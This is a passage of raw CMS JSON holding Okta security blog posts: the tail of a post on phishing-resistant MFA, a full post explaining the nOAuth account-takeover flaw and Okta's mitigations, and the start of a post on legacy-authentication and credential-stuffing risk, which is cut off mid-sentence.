guide\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.youtube.com/watch?v=7tv300TIWBs\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Going Password-less in Okta Identity Engine | Okta Demo Video\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/resources/webinar-oktas-journey-to-passwordless-phishing-resistance/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s journey to passwordless & phishing-resistance | Oktane Video\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2022/10/the-need-for-phishing-resistant-multi-factor-authentication/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"How modern credential phishing attacks work: the adversary in the middle (Part 1) | Blog\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2022/11/a-deep-dive-into-okta-fastpass/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"A Deep Dive Into Okta FastPass (Part 2) | Blog\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/resources/whitepaper-fastpass-technical-whitepaper/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"FastPass | Technical Whitepaper\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If your Workforce org is licensed for Adaptive MFA, I’d also recommend this cheeky rule that packs a lot of punch. An attacker that has stolen user credentials and/or a session cookie will almost always sign in from a New Device and a New IP address. With \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/okta-expression-language-in-identity-engine/#security-context\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Expression Langua\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/okta-expression-language-in-identity-engine/#security-context\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"ge\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", we can force authentication attempts from New Devices and New IPs to prompt for phishing-resistant factors:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"4V2FWuO0AT65orxInEGo9p\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"6KS0Vi5RrCDQ3BuF7VO9Q\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Making all user authentication flows phishing-resistant should be the north star for user identity. And Okta isn’t the only team offering guidance on this. If you need some impartial evidence, try:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"National Institute of Standards and Technology (NIST) - \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://csrc.nist.gov/pubs/sp/800/63/4/ipd\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Digital Identity Guidelines\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Cybersecurity and Infrastructure Security Agency (CISA) - \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.cisa.gov/MFA\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"More than a Password\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Australian Signals Directorate (ASD) - \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.cyber.gov.au/resources-business-and-government/essential-cyber-security/essential-eight/essential-eight-maturity-model\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Essential Eight Maturity Model\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Executive Office of the US President - \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.whitehouse.gov/wp-content/uploads/2022/01/M-22-09.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Moving the U.S. Government Toward Zero Trust Cybersecurity Principles\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"It’s time to take the phishing-resistant plunge, and Okta is here to help.\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-25T00:41:45.508Z","secAuthor":[{"id":"b006f4e2-a177-55cd-a2ee-ff041e6ece35","bio":{"bio":"John leads the EMEA node of Okta's Detection and Response Engineering team.
\n\nHis team develops detections and supplementary automations to protect Okta from threat actors, which in turn inform our rotational response and threat hunting missions.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/3156PfzPum7cu577jTvWv5/fda95a934e6567e0d6f41e6ce1da8c56/johnmurphy.jpg"},"name":"John Murphy","jobTitle":"Manager, Defensive Cyber Operations (EMEA)","slug":"john-murphy","node_locale":"en"}]},{"slug":"/articles/2023/08/saying-no-thanks-noauth","id":"20cb0e89-6af9-5249-9263-bc15b89c5ada","title":"Saying “No Thanks” to nOAuth","date":"2023-08-04T22:26:49+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"You may have heard about a vulnerability called, “nOAuth”, where, per Microsoft, “use of the email claim from access tokens for authorization can lead to an escalation of privilege.” What is this vulnerability, how can Okta help, and what are the mitigation steps and strategies to keep your own environment nOAuth free? Let’s break it down!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What is nOAuth?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Discovered in April of 2023, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.descope.com/blog/post/noauth\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"by researchers at descope\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", the nOAuth vulnerability relies on user accounts being merged by an Microsoft Azure AD OAuth application in a way that allows the attacker to takeover a user account.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The vulnerable condition was observed in several unique combinations of OAuth applications, identity providers, and where “Log in with Microsoft” was offered as a sign-in method. While the research named Microsoft-specific methods of sign-in, we feel there are lessons to be learned by all developers of OAuth apps, irrespective of which identity provider they rely on.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The nOAuth Attack\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The attack works like this: adversaries first create a new Azure AD administrator account (in an attacker-owned tenant) and alter its email address to match that of their intended target. There are two unique conditions that must be met for this to result in account takeover.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An OAuth application must:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Trust the “email” claim for verifying users (which is not a recommended practice), and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Merge user accounts whenever a user signs-in via “Sign in with Microsoft” (social login). The user must have previously signed into the app using some alternative mechanism to trigger the merge event.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If the application merges user accounts without proper validation, the attacker gains control over the target's application account, even if the victim didn't have a Microsoft account to sign-in with.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While many elements must align for this attack to work, the nOAuth attack is difficult to remedy in that it requires remediative action by both the Identity Provider (in this case, Microsoft) and the vulnerable third-party application.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Got it. What does Microsoft say about all this?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Microsoft released \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://learn.microsoft.com/en-us/azure/active-directory/develop/migrate-off-email-claim-authorization\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"guidance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://msrc.microsoft.com/blog/2023/06/potential-risk-of-privilege-escalation-in-azure-ad-applications/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"how to manage the nOAuth vulnerability\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", including:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Never use an email claim for authorization purposes.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Modify the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://learn.microsoft.com/en-us/graph/applications-authenticationbehaviors?tabs=http\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"authenticationBehaviors\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" API to reject unverified email claims to mitigate the risk for existing applications.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When developers are ready to update their code and migrate users to an immutable identifier, like OID, they can use the “xms_edov” claim to verify the email address is verified in the Azure AD tenant before the user identifier is changed.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Microsoft also told customers that it, “deployed mitigations to omit token claims from unverified domain owners for most applications”. As such, given the above advice and mitigations, we’ve mostly reached the end of the nOAuth saga. However, there’s more to consider on the topic, and we’d be remiss (and we hate being remiss) if we didn’t go a bit deeper here, because now that we know the what and how of nOAuth, we can bring the Okta world and philosophy into focus.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Saying “No Thanks” to nOAuth\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"First off, it's important to note that this vulnerability stems from a misplaced trust in self-asserted email addresses. However, the novel (and alarming) part of nOAuth is that the attack works across Azure AD tenants, rather than being contained within them.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By contrast, the Okta Workforce Identity Cloud (WIC) is architected around per-tenant (“Okta Org”) federation, and it's up to the Org administrator to determine what identifiers to support. Our tenant boundary is strict: an org administrator can't impersonate users in a different org. Our risk lens is even more granular: by using \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2022/07/build-highly-scalable-secure-apps/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"per-application signing keys\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", administrators can also mitigate risk across application instances, even within a single org.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One easy remediation within Okta's Universal Directory is configuring \\\"primaryEmail\\\" to be a read-only attribute that end users cannot change (see screenshot below).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"4UVEYrFI7wsHmCqNGhpX3G\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This attribute can also be sourced from HR or other external systems of record; these are the typical solutions for a workforce deployment.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While Okta Customer Identity offers the option to allow unverified emails to be used as part of Self-Service Registration (see screenshot below); the blast radius is again squarely within the tenant itself.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"2qhsm84O46GwgEaMNse0Ze\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Furthermore, the issuer of Microsoft tokens is \\\"MicrosoftOnline\\\", whereas for Okta it is your-org.okta.com.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This vulnerability relies on the concept of leveraging a third-party “social login” combined with a reliance on unverified user-controlled input. Okta allows for a much more secure implementation, including detection tools that greatly diminish the opportunity for this type of third-party vulnerability. In general, applications should be \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/guides/validate-id-tokens/main/#verify-the-claims\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"verifying JSON Web Token (JWT) claims\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\":\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The iss (issuer) claim matches the identifier of your Okta authorization server.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The aud (audience) claim should match the Client ID that you used to request the ID Token. This will be the Client ID for the Application you created in Okta.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The iat (issued at time) claim indicates when this ID token was issued, expressed in Unix time.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The exp (expiry time) claim is the time at which this token will expire., expressed in Unix time. You should make sure that this time has not already passed.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The nonce claim value should match whatever was passed when you requested the ID token.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The iss (issuer) must be validated in order to make sure the org that generated the JWT is indeed the correct one.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We’ve also introduced two capabilities to our Customer Identity Cloud (CIC) to reduce the attack surface. For starters, we default to setting the email_verified claim to “false” for users:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"7BnwEU2Kd0VU7NJSh4l4rT\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"CIC has also implemented an email verification flow:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"6kYRT9hlPgmFZJyslV0pRN\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If a customer takes the steps listed above, a nOAuth attack will be stopped at this screen:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"4CJvacI3ZHei2GNwrt9Ytp\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This can be a simple (yet effective) way to avoid this type of account takeover. If your application requires that the emails from an Azure AD/ADFS connection's users are always verified, you can enable the “enable email verification” flow during login for Azure AD and ADFS connections option in the tenant's Advanced Settings section.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"After the user authenticates for the first time with a non-verified email, CIC will then ask the user to verify their email by entering a one-time-use code that will be sent to their email account. If the user completes this step, the email_verified field will be set to true, and users will not be prompted again for email verification, unless Azure AD or ADFS return a different email for the user.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"And there you have it, tools and tips you can use in your Okta environments to help mitigate the nOAuth vulnerability. As always, regularly testing and validating your identity program is a critical step for your overall security health, we hope you’ve found a few things you can implement today.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-11T22:35:22.483Z","secAuthor":[{"id":"9e460982-03d4-534b-9941-c9f366f4daea","bio":{"bio":"Prior to joining Okta recently as a Senior Communications Manager, Laremy Legel worked for Amazon Web Services (AWS). Upon joining AWS in 2014, he delivered communications on topics such as Zero Trust, Defense in Depth, Confidential Computing, and global privacy regulations. After bringing two services to market (AWS Artifact and Amazon Macie), Laremy transitioned to assist the CISO of AWS and co-founded the first dedicated cloud security conference, AWS re:Inforce, in 2019.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/7EyNo4FLumgJTEON0drsXj/c2bfaa5f68c62faa9138c6163bc86914/LL.jpg"},"name":"Laremy Legel","jobTitle":"Senior Manager, Security Communications","slug":"laremy-legel","node_locale":"en"}]},{"slug":"/legacyauthrisk","id":"6123a432-3e86-5286-864d-a0cd9efca658","title":"Just How Risky is Legacy Authentication?","date":"2022-01-27T06:19:29+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Does your organization still allow users to authenticate to Office 365 or other Microsoft services using only a username and password?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you do, you’re \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/businesses-at-work/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"53x more likely to be targeted in credential-based attacks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". (No, not 53% more likely. It’s 53 times more likely).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Many organizations (at least one in ten Microsoft customers, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"as of October 2021\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\") still allow access to the M365 cloud using what Microsoft calls “Legacy Authentication”. In these requests, the client forwards the username and password with the request to the cloud service provider during sign-in. There’s no OAuth2 compatibility, which means no opportunity to apply multi-factor authentication or the rich variety of access policies designed to protect users from common credential-based attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Accounts using legacy authentication are easy pickings for attackers. Billions of stolen usernames and passwords from previous breaches are freely available on online forums (and routinely refreshed for a fee). The “point and shoot” tools to re-purpose them in credential stuffing attacks are cheap and easy to source.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Credential stuffing is a reliable form of attack because the best of us - even when \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://haveibeenpwned.com/Passwords\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"we know\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" we shouldn’t - reuse passwords across different services.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The tools used in credential stuffing and password spray attacks are in the armoury of every category of attacker, and it isn't limited to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://ag.ny.gov/press-release/2020/attorney-general-james-gets-dunkin-fill-holes-security-reimburse-hacked-customers\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"those motivated by profit\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In April 2021, the US Cybersecurity and Infrastructure Security Agency (CISA) \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.cisa.gov/uscert/ncas/alerts/aa21-116a\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"warned\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that SVR, an agency of Russia’s Foreign Intelligence Services, has been targeting M365 accounts with legacy authentication enabled using “low and slow” password spray attacks since at least 2018.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Compromised victims had:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“enabled logins using legacy single-factor authentication on devices which did not support multi-factor authentication.\\\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The FBI noted that this was:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“achieved by spoofing user agent strings to appear to be older versions of mail clients, including Apple’s mail client and old versions of Microsoft Outlook.”\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In July 2021, Microsoft \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.microsoft.com/security/blog/2021/10/11/iran-linked-dev-0343-targeting-defense-gis-and-maritime-sectors/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"warned its customers\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that attackers linked to the Islamic Republic of Iran compromised ~20 organizations in credential stuffing attacks, again by targeting Office365 tenants that allow legacy authentication. Alarmingly, these attackers appeared to have hit a success rate close to 15% (cybercrime groups are known to profit at success rates far lower than 1%).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So this year, when I was asked to provide some observations about the threat landscape for Okta’s annual \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/businesses-at-work\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Businesses At Work\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" report, I recommended they focus on this well-known risk that continues to go unaddressed in too many places.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"My colleague Matt Shancer calculated how often \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en/prod/Content/Topics/Security/threat-insight/ti-index.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta ThreatInsight\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" flagged legacy authentication requests as suspicious, and compared that to requests made using modern authentication.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight, for those unfamiliar, is Okta’s native capability for detecting high-volume credential-based attacks. Customers can configure ThreatInsight to block these requests before the attacker gets the chance to authenticate.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"7f11xiJ0UZysW6djYyhNag\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The results were emphatic. ThreatInsight detections fire far more often on requests made to M365 using legacy authentication. Adversaries specializing in high volume, credential-based attacks (“account checking” services, so to speak) are targeting these services.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This is only one 